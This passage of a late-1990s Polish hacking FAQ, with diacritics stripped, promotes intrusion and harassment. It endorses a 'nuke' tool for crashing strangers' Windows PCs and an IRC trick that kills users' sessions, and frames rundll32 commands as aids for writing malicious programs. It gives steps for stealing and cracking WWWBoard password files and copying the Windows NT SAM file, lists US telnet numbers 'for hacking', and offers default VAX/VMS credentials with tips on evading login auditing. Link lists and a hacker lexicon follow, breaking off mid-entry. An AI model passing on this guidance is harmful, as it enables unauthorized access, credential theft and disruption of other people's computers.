Naprawde go polecam u mnie zadziaa on na 100% uytkownikw Win 95.
Program ten rni si od innych tym, e potrafi on Nukowa Winshit 95
z zainstalowanym Patchem (!!!), dlatego, e patch ten obejmuje tylko 
port 139, a ta wersja NUKA zapycha take inne porty... :)

P.S Nie wiem w jaki sposb, ale udao mi si za pomoc tego progu zawiesi jakiemus gociowi 
    Win 98 + patch + antynuke !!!
---------------------------------------------------------------------------------
Restrykcja - jak si jej pozby ???

Restrykcje na IRC - jest to atrybut (r) przyznawany przy
podlaczeniu do serwera  uzytkownikom  uzywajacym modemu.
Ogranicza on w sposob  istotny  mozliwosci  uzytkownika:
nie mozna zmienic nick-a w trakcie  trwania  sesji,  nie
zostaje sie operatorem kanalu gdy sie go zaklada,  nawet
gdy  ktos  inny  da  ci  status  operatora  nie   mozesz
korzystac  z  jego  uprawnien.  
Aby si pozbyc tego atrybutu, istniej dwa sposoby:

a) wpisa /mode twoj_nick -r+i (w polsce dziaa tylko na krakow.irc.pl)
b) mona te koysta z serwerw, ktre nie nakadaj restrykcji np. irc.bt.net
---------------------------------------------------------------------------------
Dowcipy na IRC:

a) Zapro lamera na kana #5,0 (jest to kana, ktry zamyka wszystkie inne sesje IRC)
   Polecam zaprasza lamerw na ten kana przy uyciu polecenia /action ivites you on channel #5,0
   wtedy u wszystkich na ekranie pojawi sie tekst bardzo podobny i nieodroznialny dla lamera od
   prawdziwego invite :)

*********************************************************************
26)
RUNDLL32 - Czyli co tkwi w windozie... 

RunDll32, to taki fajny programik wbudowany w Windows, ktry moe by nazwany:
"Programatorem wirusw". Program ten jak wiemy moe nam uatwi prace, ale take
zawiera polecenia niezwykle pomocne do pisania zoliwych programw. Oto one:

rundll32 krnl386.exe,exitkernel - zamkniecie Windows'a bez pytania
rundll32 keyboard,disable - wycza klawiatur 
rundll32 mouse,disable - wycza myszk
rundll32 user,disableoemlayer - zawiesza system
rundll32 user,wnetcancelconnection fsa - przerywa poczenia komputera z podczonymi napdami sieciowymi serwera Novell Netware
rundll32 user,swapmousebutton - zmienia klawisze myszki
rundll32 user,setcursorpos - ustawia myszke w lewym grnym naroniku
rundll32 shell32,SHExitWindowsEx 2 - restartuje windows (bez potwierdzenia)
rundll32 shell32,SHExitWindowsEx -1 - restartuje powok Explorera (bez potwierdzenia)
rundll32 msprint2.dll,RUNDLL_PrintTestPage - drukuje stron testow
rundll32 user,wentdisconnectdialog - przywouje okno odcz dyski sieciowe
rundll32 user,SetDoubleClickTime - wylacza reakcje na podwojne klikniecie
rundll32 krnl386.exe,GlobalrealLoc - przerwanie wszystkich funkcji systemowych... (brutalne)
rundll32 krnl386.exe,FatalExit - wywietla komunikat z bdem

UWAGA: Aby przetestowa dziaanie tych polece, wybierz START>URUCHOM... i wpisz jedno z nich.
       Sprawdzaem je na sobie, wic nic nie powinno ci si sta :)

*********************************************************************
27)
WWWBoard 

Wwwboard to miejsce gdzie prowadzona jest dyskusja na jakis temat. 
Takie wwwboardy mona znale na wielu serwerach...

A) Aby zhackowac wwwboard trzeba mie haso. To haso przetrzymywane jest najczciej w passwd.txt,w katalogu, w ktrym 
     znajduje si plik wwwboard.htm lub wwwboard.html. Np. 

Adres wwwboardu to:
http://www.jakis.tam.adres.com/wwwboard/wwwboard.htm 

Aby wycign plik z hasami:
http://www.jakis.tam.adres.com/wwwboard/passwd.txt 

Niekiedy plik ten nosi nazw password.txt lub samo passwd. 
B) Teraz, kiedy ju masz plik z hasami musisz mi program ktry je rozszyfruje, polecam Johny the Ripper (!)

C) Gdy ju rozszyfrujesz haso, trzeba znale program ktrego uywa admin do zarzdzania wwwboardem.
 Najczciej znajduje si on w katalogu cgi-bin i nosi nazw wwwadmin.cgi. :-)

Sprbuj tez wpisa:
http://www.jakis.tam.adres.com/wwwboard
( na niektrych serwerach mona surfowac po dysku :-) ) 

*********************************************************************
28)

Hasa w Windows NT

Hasla w Windows NT sa przechowywane w %windir%\system32\config\sam. Niestety dostepu do tego pliku nie ma nawet administrator, poniewaz jest on stale uzywany przez system. Nie mozna go zkopiowac, ani przegladac. 

Istnieje jednak kopia, ktora zostala zrobiona podczas instalacji systemu. Znajduje sie ona w katalogu:
%windir%\repair\
Ten plik zawiera tylko dwa konta: Administratora i Guesta. 
Jezeli admin nie zmienil hasla od momentu zaistalowania systemu, to ten plik powinien wystarczyc. 

Plik z haslami mozna rowniez wydobyc, majac bezposredni dostep do komputera na ktorym jest Windows NT. Mianowicie restartujemy system, wkladamy dyskietke startowa np. Ms-Dos, kopiujemy ten plik na dyskietke, i po klopocie, mamy haselka... 

P.S Zapis %windir% naley zastpi katalogiem Windowsa !!!


*********************************************************************
29)
Spis serwerw oferujcych konta shellowe

Co to jest konto shellowe, tego chyba nie musze tumaczy, oto adresy kilku serwerw, na ktrych moesz takie
coik zaoy:

nyx.net            login: new
gnx.com            login: new
cyberspace.org     login: new user

Moe w kolejnej czci FAQ bdzie tego wicej...

P.S Dla ciemnych podaje, e na takie konto wchodzi si przez TELNET !!! :D
*********************************************************************
30)
Spis wszystkich numerw telnetowych w USA, wraz z miastami, stanami i numerami kierunkowymi...

Te numery podaje w wiadomych celach... W USA s najfajniejsze komputery do shackowania :)
Jak wiesz, s to numery telnetowy, wic nalezy si z nimi czy przez TELNET, a nie przez TELEFON !!!


MIASOT/STAN         NR. Kierunkowy            Nr. Telnetowy

AL, Anniston		205				236-9711
AL, Birmingham		205				328-2310
AL, Decatur			205				355-0206
AL, Dothan			205				793-5034
AL, Florence		205				767-7960
AL, Huntsville		205				539-2281
AL, Mobile			205				432-1680
AL, Montgomery		205				269-0090
AL, Tuscaloosa		205				752-1472
AZ, Phoenix			602				254-0244
AZ, Tucson			602				747-0107
AR, Ft.Smith		501				782-2852
AR, Little Rock		501				327-4616 
CA, Bakersfield		805				327-8146
CA, Chico			916				894-6882
CA, Colton			714				824-9000
CA, Compton			213				516-1007
CA, Concord			415				827-3960
CA, Escondido		619				741-7756
CA, Eureka			707				444-3091
CA, Fresno			209				233-0961
CA, Garden Grove		714				898-9820
CA, Glendale		818				507-0909
CA, Hayward			415				881-1382
CA, Los Angeles		213				624-2251
CA, Marina Del Rey	213				306-2984
CA, Merced			209				383-2557
CA, Modesto			209				576-2852
CA, Montery			408				646-9092
CA, Norwalk			213				404-2237
CA, Oakland			415				836-4911
CA, Oceanside		619				430-0613
CA, Palo Alto		415				856-9995
CA, Pomona			714				626-1284
CA, Sacramento		916				448-6262
CA, Salinas			408				443-4940
CA, San Carlos		415				591-0726
CA, San Diego		619				233-0233
CA, San Francisco		415				956-5777
CA, San Jose		408				294-9119
CA, San Pedro		213				548-6141
CA, San Rafael		415				472-5360
CA, San Ramon		415				829-6705
CA, Santa Ana		714				558-7078
CA, Santa Barbara		805				682-5361
CA, Santa Cruz		408				429-6937
CA, Santa Rosa		707				656-6760
CA, Stockton		209				957-7610
CA, Thousand Oaks		805				495-3588
CA, Vallejo			415				724-4200
CA, Ventura			805				656-6760
CA, Visalia			209				627-1201
CA, West Covina		818				915-5151
CA, Woodland Hills	818				887-3160
C0, Colorado		719				635-5361
CO, Denver			303				337-6060
CO, Ft. Collins		303				493-9131
CO, Grand Junction	303				241-3004
CO, Greeley			303				352-8563
CO, Pueblo			719				542-4053
CT, Bridgeport		203				335-5055
CT, Danbury			203				794-9075
CT, Hartford		203				247-9479
CT, Middletown		203				344-8217
CT, New Britain		203				225-7027
CT, New Haven		203				624-5954
CT, New London		203				447-8455
CT, Norwalk			203				866-7404
CT, Stamford		203				348-0787
CT, Waterbury		203				753-4512
DE, Dover			302				678-8328
DE, Newark			302				454-7710
DC, Washington		202				429-7896
DC, Washington		202				429-7800
FL, Boca Raton		407				338-3701
FL, Cape Coral		813				275-7924
FL, Cocoa Beach		407				267-0800
FL, Daytona Beach		904				255-2629
FL, Ft. Lauderdale	305				764-4505
FL, Gainsville		904				338-0220
FL, Jacksonville		904				353-1818
FL, Lakeland		813				683-5461
FL, Melbourne		407				242-8247
FL, Miami			305				372-0230
FL, Naples			813				263-3033
FL, Ocala			904				351-3790
FL, Orlando			407				422-4099
FL, Pensacola		904				432-1335
FL, Pompano Beach		305				941-5445
FL, St. Petersburg	813				323-4026
FL, Sarasota		813				923-4563
FL, Tallahassee		904				681-1902
FL, Tampa			813				224-9920
FL, West Palm Beach	407				833-6691
GA, Albany			912				888-3011
GA, Athens			404				548-5590
GA, Atlanta			404				523-0834
GA, Augusta			404				724-2752
GA, Colombus		404				571-0556
GA, Macon			912				743-8844
GA, Rome			404				234-1428
GA, Savannah		912				236-2605
HI, Oahu			808				528-0200
ID, Boise			208				343-0611
ID, Idaho Falls		208				529-0406
ID, Lewiston		208				743-0099
ID, Pocatella		208				232-1764
IL, Aurora			312				896-0620
IL, Bloomington		309				827-7000
IL, Chicago			312				938-0600
IL, Decatur			217				429-0235
IL, Dekalb			815				758-2623
IL, Joliet			815				726-0070
IL, Peoria			309				637-8570
IL, Rockford		815				965-0400
IL, Springfield		217				753-1373
IL, Urbana			217				384-6428
IN, Bloomington		812				332-1344
IN, Evansville		812				424-7693
IN, Ft. Wayne		219				426-2268
IN, Gary			219				882-8800
IN, Indianapolis		317				299-0024
IN, Kokomo			317				455-2460
IN, Lafayette		317				742-6000
IN, Muncie			317				282-6418
IN, South Bend		219				233-7104
IN, Terre Haute		812				232-5329
IA, Ames			515				233-6300
IA, Cedar Rapids		319				364-0911
IA, Davenport		319				324-2445
IA, Des Moines		515				288-4403
IA, Dubuque			319				556-0783
IA, Iowa City		319				351-1421
IA, Sioux City		712				255-1545
IA, Waterloo		319				232-5441
KS, Lawrence		913				843-8124
KS, Manhattan		913				537-0948
KS, Salina			913				825-7900
KS, Topeka			913				233-9880
KS, Wichita			316				262-5669
KY, Bowling Green		502				782-7941
KY, Frankfort		502				875-4654
KY, Lexington		606				233-0312
KY, Louisville		502				589-5580 
KY, Owensboro		502				686-8107 
LA, Alexandria		318				445-1053 
LA, Baton Rouge		504				343-0753 
LA, Lafayette		318				233-0002 
LA, Lake Charles		318				436-0518 
LA, Monroe			318				387-6330
LA, New Orleans		504				524-4094
LA, Shreveport		318				221-5833
ME, Augusta			207				622-3123
ME, Brewer			207				989-3081
ME, Lewiston		207				784-0105
ME, Portland		207				761-4000
MD, Annapolis		301				224-8550
MD, Baltimore		301				727-6060
MD, Frederick		301				293-9596
MA, Boston			617				292-0662
MA, Brockton		508				580-0721
MA, Fall River		508				677-4477
MA, Framingham		508				879-6798
MA, Lawrence		508				975-2273
MA, Lexington		617				863-1550
MA, Lowell			508				937-5214
MA, New Bedford		508				999-2915
MA, Northampton		413				586-0510
MA, Pittsfield		413				499-7741
MA, Salem			508				744-1559
MA, Springfield		413				781-3811
MA, Woods Hole		508				540-7500
MA, Worcester		508				755-4740
MI, Ann Arbor		313				996-5995
MI, Battle Creek		616				968-0929
MI, Detroit			313				964-2988
MI, Flint			313				235-8517
MI, Grand Rapids		616				774-0966  
MI, Jackson			517				782-8111  			
MI, Kalamazoo		616				345-3088
MI, Lansing			517				484-0062
MI, Midland			517				832-7068
MI, Muskegon		616				726-5723
MI, Pontiac			313				332-5120
MI, Port Huron		313				982-8364
MI, Saginaw			517				790-5166
MI, Southfield		313				827-4710
MI, Traverse City		616				946-2121
MI, Warren			313				575-9152
MN, Duluth			218				722-1719
MN, Mankato			517				388-3780
MN, Minneapolis		612				341-2459
MN, Rochester		507				282-5917
MN, St. Cloud		612				253-2064
MS, Gulfport		601				863-0024
MS, Jackson			601				969-0036
MS, Meridian		601				482-2210
MS, Starkville		601				324-2155
MO, Columbia		314				449-4404
MO, Jefferson City	314				634-5178
MO, Kansas City		816				221-9900
MO, St. Joseph		816				279-4797
MO, St. Louis		314				421-4990
MO, Springfield		417				864-4814
MT, Billings		406				245-7649
MT, Great Falls		406				771-0067
MT, Helena			406				443-0000
MT, Missoula		406				721-5900
NE, Lincoln			402				475-4964
NE, Omaha			402				341-7733
NV, Las Vegas		702				737-6861
NV, Reno			702				827-6900
NH, Concord			603				224-1024
NH, Durham			603				868-2924
NH, Manchester		603				627-8725
NH, Nashua			603				880-6241
NH, Portsmouth		603				431-2302
NJ, Atlantic City		609				348-0561
NJ, Freehold		201				780-5030
NJ, Hackensack		201				488-6567
NJ, Marlton			609				596-1500
NJ, Merchantville		609				663-9297
NJ, Morristown		201				455-0275
NJ, New Brunswick		201				745-2900
NJ, Newark			201				623-0469
NJ, Passaic			201				778-5600
NJ, Paterson		201				684-7560
NJ, Princeton		609				799-5587
NJ, Rahway			201				815-1885
NJ, Redbank			201				571-0003
NJ, Roseland		201				227-5277
NJ, Sayreville		201				525-9507
NJ, Trenton			609				989-8847
NM, Albuquerque		505				243-4479
NM, Las Cruces		505				526-9191
NM, Santa Fe		505				473-3403
NY, Albany			518				465-8444
NY, Binghampton		607				772-6642
NY, Buffalo			716				847-1440
NY, Dear Park		516				667-5566
NY, Hempstead		516				292-3800
NY, Ithaca			607				277-2142
NY, New York City		212				741-8100
NY, New York City		212				620-6000
NY, Plattsburgh		518				562-1890
NY, Poughkeepsie		914				473-2240
NY, Rochester		716				454-1020
NY, Syracuse		315				472-5583
NY, Utica			315				797-0920
NY, Whit Plains		914				328-9199
NC, Asheville		704				252-9134
NC, Charlotte		704				332-3131
NC, Fayetteville		919				323-8165
NC, Gastonia		704				865-4708
NC, Greensboro		919				273-2851
NC, High Point		919				889-7494
NC, North Wilkesboro	919				838-9034
NC, Raleigh			919				834-8254
NC, Res Tri Park		919				549-8139
NC, Tarboro			919				823-0579
NC, Wilmington		919				763-8313
NC, Winston-Salem		919			      725-2126 
ND, Fargo 			701				235-7717
ND, Grand Forks		701				775-7813
ND, Mandan			701				663-2256
OH, Canton			216				452-0903
OH, Cincinnati		513				579-0390
OH, Cleveland		216				575-1658
OH, Colombus		614				463-9340
OH, Dayton			513				461-5254
OH, Elyria			216				323-5059
OH, Hamilton		513				863-4116
OH, Kent			216				678-5115
OH, Lorain			216				960-1170
OH, Mansfield		419				526-0686
OH, Sandusky		419				627-0050
OH, Springfield		513				324-1520
OH, Toledo			419				255-7881
OH, Warren			216				394-0041
OH, Wooster			216				264-8920
OH, Youngstown		216				743-1296
OK, Bartlesville		918				336-3675
OK, Lawton			405				353-0333
OK, Oklahoma City		405				232-4546
OK, Stillwater		405				624-1113
OK, Tulsa			918				584-3247
OR, Corvallis		503				754-9273
OR, Eugena			503				683-1460
OR, Hood River		503				386-4405
OR, Klamath Falls		503				882-6282
OR, Medford			503				779-6343
OR, Portland		503				295-3028
OR, Salem			503				378-7712
PA, Allentown		215				435-3330
PA, Altoona			814				949-0310
PA, Carlisle		717				249-9311
PA, Danville		717				271-0102
PA, Erie			814				899-2241
PA, Harrisburg		717				236-6882
PA, Johnstown		814				535-7576
PA, King Of Prussia	215				337-4300
PA, Lancaster		717				295-5405
PA, Philadelphia		215				574-9462
PA, Pittsburgh		412				288-9950
PA, Reading			215				376-8750
PA, Scranton		717				961-5321
PA, State College		814				231-1510
PA, Wilkes-Barre		717				829-3108
PA, Williamsport		717				494-1796
PA, York			717				846-6550
RI, Providence		401				751-7910
SC, Charleston		803				722-4303
SC, Columbia		803				254-0695
SC, Greenville		803				233-3486
SC, Spartenburg		803				585-1637
SC, Pierre			605				224-0481
SC, Rapid City		605				348-2621
SC, Sioux Falls		605				336-8593
TN, Bristol			615				968-1130
TN, Chattanooga		615				756-1161
TN, Clarksville		615				552-0032
TN, Johnson City		615				282-6645
TN, Knoxville		615				525-5500
TN, Memphis			901				521-0215
TN, Nashville		615				244-3702
TN, Oak Ridge		615				481-3590
TX, Abilene			915				676-9151
TX, Amarillo		806				373-0458
TX, Athens			214				677-1712
TX, Austin			512				928-1130
TX, Brownsville		512				542-0367
TX, Bryan			409				822-0159
TX, Corpus Christi	512				884-9030
TX, Dallas			214				748-6371
TX, El Paso			915				532-7907
TX, Ft. Worth		817				332-4307
TX, Galveston		409				762-4382
TX, Houston			713				227-1018
TX, Laredo			512				724-1791
TX, Longview		214				236-4205
TX, Lubbock			806				747-4121
TX, Mcallen			512				686-5360
TX, Midland			915				561-9811
TX, Nederland		409				722-3720
TX, San Angelo		915				944-7612
TX, San Antonio		512				225-8004
TX, Sherman			214				893-4995
TX, Temple			817				773-9723
TX, Tyler			214				597-8925
TX, Waco			817				752-9743
TX, Wichita Falls		817				322-3774
UT, Ogden			801				627-1630
UT, Provo			801				373-0542
UT, Salt Lake City	801				359-0149
VT, Burlington		802				864-0808
VT, Montpelier		802				229-4966
VT, Rutland			802				775-1676
VT, White River Jct.	802			      295-7631 
VA, Blacksburg		703			      552-9181 
VA, Charlottesville	804			      977-5330 
VA, Covington		703			      962-2217 
VA, Fredericksburg	703			      371-0188 
VA, Harrisonburg		703				434-7121
VA, Herndon			703				435-1800
VA, Lynchburg		804				845-0010
VA, Newport News		804				596-6600
VA, Norfolk			804				625-1186
VA, Richmond		804				788-9902
VA, Roanoke			703				344-2036
WA, Auburn			206				939-9982
WA, Bellingham		206				733-2720
WA, Everett			206				775-9929
WA, Longview		206				577-5835
WA, Olympia			206				754-0460
WA, Richland		509				943-0649
WA, Seattle			206				625-9612
WA, Spokane			509				455-4071
WA, Tacoma			206				627-1791
WA, Vancouver		206				693-6914
WA, Wenatchee		509				663-6227
WA, Yakima			509				575-1060
WV, Charleston		304				343-6471
WV, Huntington		304				523-2802
WV, Morgantown		304				292-0104
WV, Wheeling		304				233-7732
WI, Beloit			608				362-5287
WI, Eau Claire		715		            836-9295 
WI, Green Bay		414		            432-2815 
WI, Kenosha			414			      552-9242
WI, La Crosse		608			      784-0560 
WI, Madison			608			      257-5010 
WI, Milwaukee		414				271-3914
WI, Neenah			414				722-7636
WI, Racine			414				632-6166
WI, Sheboygan		414				452-3995
WI, Wausau			715				845-9584
WI, West Bend		414				334-2206
WY, Casper			307				265-5167
WY, Cheyenne		307				638-4421
WY, Laramie			307				721-5878


Tylko nie hackuj komputerw rzdowych, bo narobisz sobie tylko kopotw... :(

Koystajc z okazju, chciaem zamieci tutaj spis wszystkich DNIC'ow telnetowych:

DNIC:				SIE:			

02041				Datanet-1
02062				DCS
02080				Transpac
02284				Telepac (Szwajcaria)
02322				Datex-P (Austria)
02392				Radaus
02342				PSS
02382				Datapak (Denmark)
02402				Datapak (Szwecja)
02405				Telepak
02442				Finpak
02624				Datex-P (Niemcy zachodnie)
02704				Luxpac
02724				Eirpak
03020				Datapac
03028				Infogram
03103				ITT/UDTS (U.S.A.)
03106				Tymnet
03110				Telenet
03340				Telepac (Meksyk)
03400				UDTS (Karakuru)
04251				Isranet
04401				DDX-P
04408				Venus-P
04501				Dacom-Net
04542				Intelpak
05052				Austpac
05053				Midas
05252				Telepac (Hong Kong - z tym radze uwaa, tam kar za hackerstwo jest mier...)
05301				Pacnet
06550				Saponet
07240				Interdata
07241				Renpac
07421				Dompac
09000				Dialnet

*********************************************************************

31)
Hackowanie systemu VAX/VMS

    System VMS (Virtual Memory System) jest uruchamiany przez VAX. Wiesz, ze musisz
maiec system VAX, kiedy pokaze sie prompt "username". Pisz wielkimy listerami - takim
wydaje sie byc standard w VAX'ksie. W razie watpliwosci napisz "HELP" a otrzymasz
kilka informacji. 
Oto kilka domyslnych nazwy uzytkownikow i hasel dla VAX'a:

  
Uytkownik:				Haso:

SYSTEM				OPERATOR
SYSTEM				MANAGER
SYSTEM				SYSTEM
SYSTEM				SYSLIB
OPERATOR				OPERATOR
SYSTEST				UETP
SYSTEST				SYSTEST
SYSTEST				TEST
SYSMAINT				SYSMAINT
SYSMAINT				SERVICE
SYSMAINT				DIGITAL
FIELD					FIELD
FIELD					SERVICE
GUEST					GUEST
GUEST					unpassworded
DEMO					DEMO
DEMO					unpassworded
TEST					TEST
DECNET				DECNET

     
Oto kilka polecen, ktre mog ci si przyda podczas wama do systemu VAX/VMS:

polecenie(skrt)  co robi:
 
 HELP (H)		pomoc
 TYPE (T)		padglad zawartosci pliku
 RENAME (REN)	zmienia nazwe pliku
 PURGE (PU)		kasowanie starej wersji pliku
 PRINT (PR)		drukowanie
 DIRECTORY (DIR)	listownie plikow
 DIFFERENCES (DIF)pokazuje roznice miedzy plikami
 CREATE (CR)	tworzenie pliku
 DELETE (DEL)	kasowanie
 COPY (COP)		kopiowanie
 CONTINUE (C)	kontynuacja sesji


 Plik password w VAX'ksie jest dostepne po wpisaniu polecenia:

 SYS$SYSTEM:SYSUAF.DAT

 Plik password w wiekszosci VAX'ow nie jest dostepne dla zwykego uytkownika, ale
 sprobuj. Bd bardzo ostrozny podczas hakingu VAX'a poniewa zapamietywany
 jest kada niudana prba zalogowania si. Nie bez przyczny jest on porownywany do 
 jednego z najbardziej zabezpieczonych systemw. Z tego powodu, nie radzibym prbowa
 wamw osobom poczatkujacym w haking'u. Jeeli ju umiesz duo, lub prawie duo
 radzilbym ebys sprbowa kilku hase w krtkim czasie a nastepnie odczeka kilka
 dni i znow sprobowa, poniewaz kiedy prawdziwy uzytkownik logouje sie, zostaj
 wyswietlone wszysktkie ze prby logowania.

*********************************************************************

(WWW)
http://www.underground.org.pl                 (to jest prawdziew CO, lepszego nie znajdziesz !!!)
http://www.cyberarmy.com                      (POLECAM, niestety po ANGIELSKU)
http://www.hackers.com
http://www.haker.com.pl                       (Duo trojanw, Faq i innego softu, jak znacie haso do download mail.to.my)
http://www.hacker.org
http://www.rootshell.com                      (NAPADY NA LINUX'a i UNIX'a + exploity)
http://wwww.hack.pl                           (Powoli rozwijajcy si serwis...)
http://www.friko5.onet.pl/lu/pherakpl         (POLECAM !!!)
http://www.free.com.pl/ground/polski/index
http://www.underground.com.pl                 (POLECAM !!!)
http://www.nmrc.org/
http://www.tipjar.com/generic.html) 
http://www.hackersclub.com/km/                (POLECAM !!!)
http://www.hackersclub.com/lou
http://www.l0pht.com                          (POLECAM !!!)
http://www.silitoad.org
http://www.ilf.net/rebnet/LRhp.html
http://www.geocities.com/CapeCanaveral/3498/security.htm
http://www.2600.com/                          (Synna grupa hackerska + kwartalnik hackerski)
http://www.fc.net/phrack.html
http://www.underground-online.com/
http://www.hackers.com/hacker101
http://www.asmodeus.com/
http://www.geek-girl.com/bugtraq/
http://www.cert.org
http://www.elitehackers.org/
http://astalavista.box.sk 
http://www.dhp.com/~fyodor 
http://www.hacked.net/
http://rainbow.mimuw.edu.pl/SO/Linux/index.html 
http://www.ict.pwr.wroc.pl/listserv/security/
http://www.phrack.com                          (POLECAM !!!)
http://www.infonexus.com/~daemon9/Projects
http://voltronik.tarman.net/cracker.html
http://www.nmrc.org/compute/intrude.html
http://www.leviathan.org/phrack.html
http://www.sevenlocks.com/
http://www.nmrc.org/ 
http://www.alw.nih.gov/Security/prog-full.html
http://www.cs.uit.no/~runeb
http://www.fc.net/phrack     
http://dhea.natureplus.com
http://www.scramblingnews.com
http://www.hackerscatalog.com
http://ireland.iol.ie/~kooltek/welcome.html
http://www.pixi.com/~reader1.
http://www.w00w00.org and ftp://ftp.w00w00.org/pub
http://aeneas.mit.edu (Kerberos) 
http://alex.sp.cs.cmu.edu (Misc) 
http://asylum.sf.ca.us (Cyber-wojownicy - grupa hackerska) 
http://athena-dist.mit.edu (Projekt Ateny) 
http://atlantis.utmb.edu (Anti-virus) 
http://bellcore.com (Bellcore) 
http://cert.org (CERT) 
http://ciac.llnl.gov (CIAC) 
http://clark.net (H/P) 
http://cnit.nsk.su (Security) 
http://coast.cs.purdue.edu (wszystko na temat zabezpiecze) 
http://coombs.anu.edu.au (zabezpieczenia) 
http://csrc.ncsl.nist.gov (zabezpieczenia) 
http://dartmouth.edu (zabezpieczenia) 
http://ds.internic.net (DOKUMENTACJA INTERNETU ?!) 
http://etext.archive.umich.edu (PrivateLine) 


(FTP)
FTP.GreatCircle.COM, 
ftp.ishiboo.com/phrack
ftp.3com.com (Orange Book) 
ftp.acns.nwu.edu (Mac Anti-virus) 
ftp.acsu.buffalo.edu (zabezpieczenia) 
ftp.alantec.com (Tcpr)  
ftp.armory.com 
ftp.auscert.org.au (Australian CERT) 
ftp.cerf.net (CERFnet)
ftp.cert.dfn.de
ftp.cisco.com (Cisco)
ftp.commerce.net (Zabezpieczenia WWW przy uyciu HTML)
ftp.cs.colorado.edu
ftp.cs.ruu.nl (zabezpieczenia & program kodujcy PGP)
ftp.cs.uwm.edu (zabezpieczenia)
ftp.cs.vu.nl 
ftp.cs.yale.edu 
ftp.csi.forth.gr 
ftp.csl.sri.com (SRI) 
ftp.csn.org (Cryptology) 
ftp.csua.berkeley.edu (kryptografia - amanie hase) 
ftp.delmarva.com 
ftp.denet.dk 
ftp.digex.net 
ftp.dsi.unimi.it 
ftp.dstc.edu.au 
ftp.ee.lbl.gov 
ftp.eff.org (EFF) 
ftp.elelab.nsc.co.jp (zabezpieczenia) 
ftp.etext.org
ftp.fc.net (phrack) 
ftp.foobar.com 
ftp.funet.fi 
ftp.gate.net 
ftp.giga.or.at 
ftp.greatcircle.com (Firewalls - czyli zabezpieczenia anty-hackerskie) 
ftp.ieunet.ie (zabezpieczenia) 
ftp.ifi.uio.no 
ftp.indirect.com 
ftp.info.fundp.ac.be 
ftp.informatik.uni-hamburg.de 
ftp.informatik.uni-kiel.de 
ftp.inoc.dl.nec.com (zabezpieczenia) 
ftp.isi.edu 
ftp.lava.net 
ftp.lerc.nasa.gov 
ftp.llnl.gov (CIAC) 
ftp.lod.com Lod com 
ftp.luth.se 
ftp.lysator.liu.se 
ftp.mcs.anl.gov 
ftp.microserve.net (Mac) 
ftp.near.net (MAG DLA HACKERW) 
ftp.nec.com 
ftp.net.ohio-state.edu  
ftp.netcom.com (H/P)  
ftp.netsys.com 
ftp.ocs.mq.edu.au (kryptologia) 
ftp.ox.ac.uK 
ftp.paranoia.com
ftp.pop.psu.edu 
ftp.primenet.com
ftp.primus.com (zabezpieczenia) 
ftp.psy.uq.oz.au  
ftp.rahul.net  
ftp.sert.edu.au 
ftp.sgi.com  
ftp.std.com (Gazeta hackerska)  
ftp.sura.net 
ftp.technet.sg 
ftp.tis.com
ftp.tisl.ukans.edu 
ftp.uni-koeln.de
ftp.uspto.gov 
ftp.uu.net (Magazyn hackerski) 
ftp.uwp.edu
ftp.vis.colostate.edu 
ftp.vix.com 
ftp.vortex.com 
ftp.warwick.ac.uk (Magazyn hackerski)
ftp.wi.leidenuniv.nl 
ftp.win.tue.nl (zabezpieczenia)
ftp.winternet.com
ftp.wustl.edu
ftp.zoom.com
azrael.phrack.com/pub/phrack
ftp.zrz.tu-berlin.de (Kryptologia)
garbo.uwasa.fi (Kryptologia) 
gti.net 
gumby.dsd.trw.com 
hack-this.pc.cc.cmu.edu
heffer.lab.csuchico.edu
hplyot.obspm.fr 
info.mcs.anl.gov 
jerico.usc.edu 
invircible.com
l0pht.com (Grupa hackerska - The L0pht) 
lcs.mit.edu
mac.archive.umich.edu 
mary.iia.org
monet.ccs.itd.umich.edu 
net.tamu.edu (zabezpieczenia) 
net23.com
nic.ddn.mil (zabezpieczenia DDN) 
nic.sura.net 
oak.oakland.edu
parcftp.xerox.com 
prism.nmt.edu
pyrite.rutgers.edu (zabezpieczenia) 
relay.cs.toronto.edu
rena.dit.co.jp (zabezpieczenia)
research.att.com
ripem.msu.edu
rtfm.mit.edu (Usenet FAQ)
scss3.cl.msu.edu 
sierra.stanford.edu 
sunsolve1.sun.com 
ftp.technion.ac.il 
theta.iis.u-tokyo.ac.jp (zabezpieczenia) 
titania.mathematik.uni-ulm.de (zabezpieczenia) 
toxicwaste.mit.edu (amanie zabezpiecze RSA [klasyfikatora treci niepodanych])
ugle.unit.no 
vic.cc.purdue.edu 
vixen.cso.uiuc.edu 
wimsey.bc.ca
*********************************************************************

DODATEK SPECJALNY - LEKSYKON ZNANYCH HACKERW:

Richard Stallman
Stallman zosta pracownikiem Laboratorium Sztucznej inteligencji MIT w roku 1971. Za wkad w dziedzin oprogramowania otrzyma nagrod McArthur Genius w wysokoci 250 tysicy dolarw.
Zaoy Fundacj Darmowego oprogramowania (free Software Foundation), w ramach ktrej stworzono setki nieodpatnych narzdzi dla platformy UNIX. Zwyk pracowa na nieco archaicznych maszynach, w tym na PDP-10 firmy DEC (do ktrego pewnie wci ma gdzie dostp).

Dennis Ritchie, Ken Thomson i Brian Kernighan
Ritchie, Thompson i Kernighan to programici firmy Bell Labs; im zawdziczamy istnienie systemu Unix i jzyka C. Bez tej trjki nie byo by internetu (albo byby duzo mniej funkcjonalny). Cigle s aktywni. Naprzykad Ritchie pracuje nad systemem Plan9, ktry by
moe zajmnie miejsce UNIX-a jako standartowego systemu dla sieci komputerowych.

Paul Baran, Rand Corporation
Paul Baran to prawdopodobnie najznakomitrzy Hacker w historii- zajmowa sie internetem jeszcze zanim zacz istnie! Rozpracowywa sam ide sieci globalnej i stworzy podstawy, na ktrych oparli si jego nastpcy.

Eugene Spafford
Spafford jest znanym i cenionym profesorem informatyki Uniwersystetu Purdue. Mia ogromny
wkad w powstanie systemu bezpieczestwa COPS, Pautomatycznej procedury zabezpieczenia sieci. Spafford wyksztaci niejednego wybitnego specjalist i jest figur bardzo powan w krgach informatycznych.

Dan Farmer
Przebywajc na Uniwersytecie Carnregie Mellon jako czonek grupy CERT Farmer pracowa ze Spaffordem nad systemem COPS. Potem Farmer zyska z(?)saw tworzc program skanujcy SATAN, potrzne narzdzie do analizy zdalnych sieci na wystpowanie luk w bezpieczestwie.

Wietse Venema
Venema jest pracownikiem Inststytutu Technologicznego w Eindhowen w Holandii. To niezwykle utalentowany programista, stworzy niejedno narzdzie okrelone mianem standardu przemysowego. By wspautorem SATAN-a i napisa program TCP Wrapper - czsto uywane narzdzie suzce do monitorowania przychodzcych pakietw danych.

Linus Torvalds
